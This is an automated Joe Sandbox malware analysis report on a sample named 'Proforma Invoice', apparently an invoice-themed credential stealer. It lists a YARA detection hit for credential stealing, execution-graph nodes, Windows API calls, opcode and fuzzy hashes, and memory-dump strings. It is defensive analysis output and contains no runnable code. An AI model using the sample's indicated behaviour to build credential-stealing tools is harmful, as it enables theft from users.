• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low


Execution Graph

Execution Coverage: 6.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 76
Total number of Limit Nodes: 5
                                                                                                    execution_graph 20306 f5d3b0 GetCurrentProcess 20307 f5d423 20306->20307 20308 f5d42a GetCurrentThread 20306->20308 20307->20308 20309 f5d467 GetCurrentProcess 20308->20309 20310 f5d460 20308->20310 20311 f5d49d GetCurrentThreadId 20309->20311 20310->20309 20313 f5d4f6 20311->20313 20314 f5b590 20315 f5b5d2 20314->20315 20316 f5b5d8 GetModuleHandleW 20314->20316 20315->20316 20317 f5b605 20316->20317 20318 f540e8 20319 f54105 20318->20319 20320 f54112 20319->20320 20328 f54248 20319->20328 20324 f5387c 20320->20324 20322 f5415b 20325 f53887 20324->20325 20333 f5800c 20325->20333 20327 f58385 20327->20322 20329 f5424c 20328->20329 20391 f54339 20329->20391 20395 f54348 20329->20395 20334 f58017 20333->20334 20337 f5808c 20334->20337 20336 f587d5 20336->20327 20338 f58097 20337->20338 20341 f580bc 20338->20341 20340 f588ba 20340->20336 20342 f580c7 20341->20342 20345 f580ec 20342->20345 20344 f589aa 20344->20340 20346 f580f7 20345->20346 20348 f590be 20346->20348 20352 f5aeb0 20346->20352 20355 f5aeaf 20346->20355 20347 f590fc 20347->20344 20348->20347 20358 f5cfd0 20348->20358 20362 f5af98 20352->20362 20353 f5aebf 20353->20348 20356 f5aebf 20355->20356 20357 f5af98 LoadLibraryExW 20355->20357 20356->20348 20357->20356 20360 f5cfd4 20358->20360 20359 f5d025 20359->20347 20360->20359 20379 f5d298 20360->20379 20363 f5af9c 20362->20363 20364 f5afcb 20363->20364 20367 f5b638 20363->20367 20371 f5b628 20363->20371 20364->20353 20368 f5b64c 20367->20368 20370 f5b671 20368->20370 20375 f5b198 20368->20375 20370->20364 20372 f5b638 20371->20372 20373 f5b198 LoadLibraryExW 20372->20373 20374 f5b671 20372->20374 20373->20374 20374->20364 20376 f5b818 LoadLibraryExW 20375->20376 20378 f5b891 20376->20378 20378->20370 20381 f5d2a5 20379->20381 20380 f5d2df 20380->20359 20381->20380 20383 f5b498 20381->20383 20384 f5b4a3 20383->20384 20385 f5dfd8 20384->20385 20387 f5b560 
20384->20387 20388 f5b56b 20387->20388 20389 f580ec LoadLibraryExW 20388->20389 20390 f5e047 20389->20390 20390->20385 20392 f5433c 20391->20392 20393 f5444c 20392->20393 20399 f53e74 20392->20399 20397 f5436f 20395->20397 20396 f5444c 20396->20396 20397->20396 20398 f53e74 CreateActCtxA 20397->20398 20398->20396 20400 f553d8 CreateActCtxA 20399->20400 20402 f5549b 20400->20402 20403 f5d5d8 DuplicateHandle 20404 f5d66e 20403->20404
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae5542526c095f86640457489de1f11006b938df6cc702bc4aea8541df4421c0
                                                                                                    • Instruction ID: f59fcdadaaa42acf29d5a83360d7e046f2c91a7650a809e562b87d64d2209977
                                                                                                    • Opcode Fuzzy Hash: ae5542526c095f86640457489de1f11006b938df6cc702bc4aea8541df4421c0
                                                                                                    • Instruction Fuzzy Hash: F9A17032E006198FCF15DFA5C8445DEB7F2FF89301B1585BAEA05BB221EB35A949DB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F5D410
                                                                                                    • GetCurrentThread.KERNEL32 ref: 00F5D44D
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00F5D48A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F5D4E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Current$ProcessThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2063062207-0
                                                                                                    • Opcode ID: bcc687e30b5d05b0676158959129ebca3f6ed04b8b7caedcb1d595b3d27dc421
                                                                                                    • Instruction ID: d6d5d2fabb245db2a107adff1163a954059bf7cfba0fd1ed3b113fb90139ae49
                                                                                                    • Opcode Fuzzy Hash: bcc687e30b5d05b0676158959129ebca3f6ed04b8b7caedcb1d595b3d27dc421
                                                                                                    • Instruction Fuzzy Hash: 0E5153B0D052498FDB64CFA9D548B9EBBF0FF48314F248469E519A7350D774A848CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F55489
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 73a71be957074eeda89acd408513a9e549a6cd577641095429010459867a4b02
                                                                                                    • Instruction ID: 0ae682e5a5cdefd966f9bc76fb753dbc3ea89eab920ba589306fa35f8d1ad685
                                                                                                    • Opcode Fuzzy Hash: 73a71be957074eeda89acd408513a9e549a6cd577641095429010459867a4b02
                                                                                                    • Instruction Fuzzy Hash: 0B415671C04718CFDB20CF99C9547CEBBB1BF48308F24802AD518AB251DBB1994ACF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F55489
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 75b67daf5f05715f9d25fd2d8e4e7dd522c25c04d64f5ce37560c644c2939793
                                                                                                    • Instruction ID: b4b9a1ee0eaa66b82d69ac396f85fb526667d2be95a16f5f0660621f3965558b
                                                                                                    • Opcode Fuzzy Hash: 75b67daf5f05715f9d25fd2d8e4e7dd522c25c04d64f5ce37560c644c2939793
                                                                                                    • Instruction Fuzzy Hash: 8B410471C0471CCFDB24CFA9C85478EBBB5BF48308F24806AD519AB251DB75698ACF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F5D65F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 0a6e46242a36ea8dda7d875a0d85a9a34b06f352ae87fbcdc8c28f66609613f0
                                                                                                    • Instruction ID: 9e982bbc221864d882da5a9523a22d8c66df4fb1d8d2ce2ab82d057f17509851
                                                                                                    • Opcode Fuzzy Hash: 0a6e46242a36ea8dda7d875a0d85a9a34b06f352ae87fbcdc8c28f66609613f0
                                                                                                    • Instruction Fuzzy Hash: 2C21D5B5D01209AFDB10CFA9D484ADEBBF4FB48324F14841AE954A7310D374A955CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5B671,00000800,00000000,00000000), ref: 00F5B882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: 7c6a963963e64c93e246d7d11aba6ba515ec9bd00ee5a1595ed686374b5438c8
                                                                                                    • Instruction ID: ab9b0fe9cdc1f1ca028b72f66f4a02705a38f6b9415c373065bf9f4a24c4573c
                                                                                                    • Opcode Fuzzy Hash: 7c6a963963e64c93e246d7d11aba6ba515ec9bd00ee5a1595ed686374b5438c8
                                                                                                    • Instruction Fuzzy Hash: C62127B2C003498FDB10CFA9C884BDEFBF4AB59325F14846AD955A7201C3749946CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5B671,00000800,00000000,00000000), ref: 00F5B882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: a8ef19fb343258e650f8378912e924f6fd72c766142eb73b7d3cc8135d4e4126
                                                                                                    • Instruction ID: 095da7ae8b55a47fc972c75529b550aa64da14d4da8e7183fa0c0e48c53c76f6
                                                                                                    • Opcode Fuzzy Hash: a8ef19fb343258e650f8378912e924f6fd72c766142eb73b7d3cc8135d4e4126
                                                                                                    • Instruction Fuzzy Hash: FA1117B2D003099FDB10CF9AC444BDEFBF9EB58325F15842AE915A7200C374A949CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5B5F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: e6116a514721a19c0ae2e89d40316cab47046f303688297071f47a7dba3d246a
                                                                                                    • Instruction ID: faf4fbc7d3c6afc97a134bf9f2b015749914803c90cbb640d57d2e8022550d20
                                                                                                    • Opcode Fuzzy Hash: e6116a514721a19c0ae2e89d40316cab47046f303688297071f47a7dba3d246a
                                                                                                    • Instruction Fuzzy Hash: 541132B2C006498FCB20CFAAC844BDEFBF4AF89324F04805AD868A7201D374A545CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4da0007aa5315c0a88a44aa6f1cedfb1ce64a0c4ed2311f4f29f2b8a3a2933b6
                                                                                                    • Instruction ID: 455e058ef091f3b9404afb4566b7654deb7d0ac9b450f819d1c3b98e62114d45
                                                                                                    • Opcode Fuzzy Hash: 4da0007aa5315c0a88a44aa6f1cedfb1ce64a0c4ed2311f4f29f2b8a3a2933b6
                                                                                                    • Instruction Fuzzy Hash: A411ADB2D043048FDB208BA9D4043EABBB4EF95326F05849ADA09AB211C375981ADB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5B5F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415899517.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_f50000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 195cae4f62b4de2e4d3414e51056e6c274c4006cf404dccb7eeea183a0bcce1c
                                                                                                    • Instruction ID: 131b914cbd8d863978d1414db31abd8ab2dd07fc100a7e231f516650b762ec01
                                                                                                    • Opcode Fuzzy Hash: 195cae4f62b4de2e4d3414e51056e6c274c4006cf404dccb7eeea183a0bcce1c
                                                                                                    • Instruction Fuzzy Hash: C91110B2C003498FCB20CF9AC444BDEFBF4AB88324F14841AD829B7200D374A549CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
                                                                                                    Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac29fe3f66caa2bd6a0ac2d209909f483072bf286b7bd2aeff9ece081a4f60ec
• Instruction ID: a2616f8b40d5b9a15d873d233b26990b621919406f7d1f2e49c528958b72ad1e
• Opcode Fuzzy Hash: ac29fe3f66caa2bd6a0ac2d209909f483072bf286b7bd2aeff9ece081a4f60ec
• Instruction Fuzzy Hash: 7D214871A48240DFCB01DF10EDC0B26BF61FB8836CF24C569E8065B606C336D856C7A1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da1f09cfa2157beda02056e3490658fe60fa15370817e74c8e75e625ce9b3523
• Instruction ID: 5873c9941e8526e9f8fb5288fa0574069783a2bd2aa0431f01a8db1f7c302abf
• Opcode Fuzzy Hash: da1f09cfa2157beda02056e3490658fe60fa15370817e74c8e75e625ce9b3523
• Instruction Fuzzy Hash: D721D3715082809FDB01DF50D9C0B26BB75FF84318F24C5A9E9496B256C336D857CA61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1f2140cdbd90224064b232e1e14957ca653faea5761f78b0e04933aff786508
• Instruction ID: 3b839ada826f838b08bc2dd03cf564aefd75a7ee88b74bb4b01ac12802d2ddb6
• Opcode Fuzzy Hash: e1f2140cdbd90224064b232e1e14957ca653faea5761f78b0e04933aff786508
• Instruction Fuzzy Hash: 5521D075508240DFCB14DF20D9C0B26BB76FF84318F24D9A9E90E5B246C336D857CA61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6169a9f5e5154138bd710897337c028e8f47fd46b5cb4f0fb87114d1f2d90653
• Instruction ID: 07f62be44c819da6d24a712c0a9e2e4170963b571a4c21031891366beeb38b0d
• Opcode Fuzzy Hash: 6169a9f5e5154138bd710897337c028e8f47fd46b5cb4f0fb87114d1f2d90653
• Instruction Fuzzy Hash: 69217F7550D3808FCB02CF20D990B15BF71EF46214F28C5EAD8498B697C33A985ACB62
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f69d7024cdfcefd926ead02efcbb901b97aad1906707df055ccf3b322d20e9c3
• Instruction ID: bc6cbef03c04565937c153e34ef2f6a2a7198ea4c1f9b3d3ef2b4fe502cfb1c8
• Opcode Fuzzy Hash: f69d7024cdfcefd926ead02efcbb901b97aad1906707df055ccf3b322d20e9c3
• Instruction Fuzzy Hash: CD110876948280CFCF11CF10E9C4B16BF71FB84328F28C6A9D8455B656C336D866CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
• Instruction ID: bd82778cc2b2a4876b18f2f70d1f7668bc9d9509c95e01c2ec9b2c9bb2c7edac
• Opcode Fuzzy Hash: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
• Instruction Fuzzy Hash: 18118B75908280DFCB11CF50D9C4B15BBB1FF84328F28C6A9D8495B666C33AD85BCB61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a1461d0cbe32b05da44dccc9ce5bcf354a0506150ca943d646954bde762e7424
• Instruction ID: 77a152d644e469321d4445f4c6862fcd451d54dfd9f6de6ae6da239d8f695c55
• Opcode Fuzzy Hash: a1461d0cbe32b05da44dccc9ce5bcf354a0506150ca943d646954bde762e7424
• Instruction Fuzzy Hash: 5E01F77194C3449AE7108A11DC847AABB98EF413B8F18841AED486B242C379D840CAB2
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa5cf111457c5592fdd0a5b744b2d45e84e5a775094dbf6becc1df36425b8153
• Instruction ID: 9d7e13d8afad26d893ae69d945531798bfa9fab6c7501cc5a02e0a4759cf54c8
• Opcode Fuzzy Hash: fa5cf111457c5592fdd0a5b744b2d45e84e5a775094dbf6becc1df36425b8153
• Instruction Fuzzy Hash: 7FF096729083449EEB108A15DDC4B67FFD8EB51778F18C45AED485F286C3799C44CAB1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68dd066efccdef2cae6fb2b941d44568bd157469e8fcd02b2c2e931ebae7caa9
• Instruction ID: 4abdb7a81dfdc1218894e16c57d22c59df22690b44dec7d98770842627c7f02b
• Opcode Fuzzy Hash: 68dd066efccdef2cae6fb2b941d44568bd157469e8fcd02b2c2e931ebae7caa9
• Instruction Fuzzy Hash: C4E0C27180920CEFC700DFB0E4946EE77FDEB0A305F1014A6960683110EB310E14C791
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: W$*c
• API String ID: 0-3557142924
• Opcode ID: e5a90b5322df59fd62abf8f593f2d45e5645956c246aa2f113605f61ffe282b0
• Instruction ID: ddc59077bc2b9c6fdf3303776f74a058aa0a952186ca0d15a9ddb9eddc236c00
• Opcode Fuzzy Hash: e5a90b5322df59fd62abf8f593f2d45e5645956c246aa2f113605f61ffe282b0
• Instruction Fuzzy Hash: F771F2B4E0520A9FCB04CF99D5809AEFBF2BF48314F188519D51AAB614D730AA42CF94
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: W$*c
• API String ID: 0-3557142924
• Opcode ID: 01893d10785ea51d86b0155e88d56ba031a639c834025b65fbdff3608cff632c
• Instruction ID: 5866bd80ad14cd1d9171058e63858ff5d5f3ad63c739dd1857cde7bdc924e827
• Opcode Fuzzy Hash: 01893d10785ea51d86b0155e88d56ba031a639c834025b65fbdff3608cff632c
• Instruction Fuzzy Hash: 2661F574E1624A9FCB04CFA9C5809AEFBF2FF48314F188516D51AAB714D730AA42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: 022M$022M
• API String ID: 0-2238841970
• Opcode ID: d40e320c8d265f0606a06ce1995871db2fe30eaf0acbe62d794f963b9be1cfc6
• Instruction ID: de00d99f476d2b81f1dc919b660b5554bb0a0910023de92b0274c08dcecb774a
• Opcode Fuzzy Hash: d40e320c8d265f0606a06ce1995871db2fe30eaf0acbe62d794f963b9be1cfc6
• Instruction Fuzzy Hash: 5C411C70D1820A9FCB04CFAAC5815AEFBF2FF89300F24C46AD515A7655D7349A42CF94
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: 022M$022M
• API String ID: 0-2238841970
• Opcode ID: 82b33a13bb808306d5a33bbc2b6d73c51c055220690ca2d0a35aa4d86869bbea
• Instruction ID: f1a5dfaa11b52f9ae06f9b084cf0424b2e2788802234b7a74fb6992af96d266f
• Opcode Fuzzy Hash: 82b33a13bb808306d5a33bbc2b6d73c51c055220690ca2d0a35aa4d86869bbea
• Instruction Fuzzy Hash: CF41E670E1420A9BCB04CFAAC5815AEFBF6BF88300F24C46AD616B7615D7349A41CFA4
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: -nqj
• API String ID: 0-2853604900
• Opcode ID: bc8faaac6e6b4ca773e24fbc43255c8d8db1df1a5f8312c57f41f1c8875fc6af
• Instruction ID: 2d94ecf7c1c268bb149499ae3461075fd5ba44c2f58fd8c995391914d5d20984
• Opcode Fuzzy Hash: bc8faaac6e6b4ca773e24fbc43255c8d8db1df1a5f8312c57f41f1c8875fc6af
• Instruction Fuzzy Hash: 81D14CB4E1420ADFCB04CF95C4858AEFBB6FF99301F14C959D516AB264D734AA82CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: -nqj
• API String ID: 0-2853604900
• Opcode ID: 27116106f5ede689ea04898c33a3a2b679fa390e021de8511b71f9f933230e17
• Instruction ID: 7f75816edd466c1f51785f6bd4603871ff19e55648025163679eb1e78f1a48e2
• Opcode Fuzzy Hash: 27116106f5ede689ea04898c33a3a2b679fa390e021de8511b71f9f933230e17
• Instruction Fuzzy Hash: 5ED14B75E1420ADFCB04CFA5C4858AEFBB7FF89300B14C955D516AB268D734AA82CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: X"v
• API String ID: 0-1462037591
• Opcode ID: 0c7bb7d0af3bbe9d068a72e38cbe1f8974742d201631813507c47ca7f93a1503
• Instruction ID: 180b42eb8d5e6b76c0a44db12388c340022d13b1e3a51526d0e3fa1d7c99cac4
• Opcode Fuzzy Hash: 0c7bb7d0af3bbe9d068a72e38cbe1f8974742d201631813507c47ca7f93a1503
• Instruction Fuzzy Hash: 83B13575E04649CFCB04CFA9D985ADEBBB2EF89300F18812AD509AB364D7309946CF60
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
Similarity
• API ID:
• String ID: Mc?Q
• API String ID: 0-1176068571
• Opcode ID: 68c6a94265dcda5939c9c9a0b2a4d45a15428200c55ec1b5f32d8e9ea9223bae
• Instruction ID: 60a63da1dec27f4ceca34d2e035bc7c3a8c4bbdd40547646ddbe5038a1de7d5d
• Opcode Fuzzy Hash: 68c6a94265dcda5939c9c9a0b2a4d45a15428200c55ec1b5f32d8e9ea9223bae
• Instruction Fuzzy Hash: D651F874E09209DFDB08CF9AD9516AEFBF3EB88300F14D42AE519AB254D7349A418F94
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Mc?Q
                                                                                                    • API String ID: 0-1176068571
                                                                                                    • Opcode ID: f28250eb167b6dfe0d0b933b374f0842d62e90b22f53d7b3cb82529ee889c41b
                                                                                                    • Instruction ID: 60b6df2e5df7203752096b77123b489b305a3f7532e4f5dac9dcfe87da08e63a
                                                                                                    • Opcode Fuzzy Hash: f28250eb167b6dfe0d0b933b374f0842d62e90b22f53d7b3cb82529ee889c41b
                                                                                                    • Instruction Fuzzy Hash: 33510A74E0520ADFDB08CFAAD9515AFFBF3EB88300F14D42AE519AB254D7349A418F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L;p
                                                                                                    • API String ID: 0-1047063510
                                                                                                    • Opcode ID: b4e6d8c8d5f82f364eebd7bd30d33c01a8b9c2b954824150c501fb378a464070
